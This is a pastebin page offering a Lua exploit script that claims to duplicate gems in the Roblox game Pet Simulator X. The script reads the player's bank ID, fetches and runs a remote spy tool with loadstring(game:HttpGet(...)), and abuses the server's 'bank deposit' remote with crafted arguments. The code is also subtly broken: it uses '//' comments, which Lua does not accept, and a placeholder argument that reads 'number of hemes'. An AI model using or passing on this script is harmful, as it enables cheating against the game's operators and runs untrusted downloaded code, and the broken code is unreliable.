The text below is selected, press Ctrl+C to copy to your clipboard. (⌘+C on Mac) No line numbers will be copied.
Guest
Pet Simulator X [Dupe Gems] script pastebin roblox
By Pet Simulator X [Dupe Gems] on 2024-09-22 08:00 am | Syntax: LUA | Views: 17



New Script | Raw | Show/Hide line no. | Copy text to clipboard
  1. // Recognizing our BankID
  2. local lib = require(game.ReplicatedStorage:WaitForChild('Framework'):WaitForChild('Library'))
  3. local mybanks = lib.Network.Invoke("get my banks")
  4. local BankID = mybanks[1]['BUID']
  5. setclipboard(BankID)
  6. // Script for finding pet IDs
  7. loadstring(game:HttpGet("https://github.com/exxtremestuffs/SimpleSpySource/raw/master/SimpleSpy.lua"))()
  8. // The dupe script itself
  9. local args = {
  10.     [1] = {
  11.         [1] = "here_bankid",
  12.         [2] = {},
  13.         [3] = number of hemes
  14.     }
  15. }
  16. workspace.THINGS.REMOTES:FindFirstChild("bank deposit"):InvokeServer(unpack(args))



  • Recent Roblox Scripts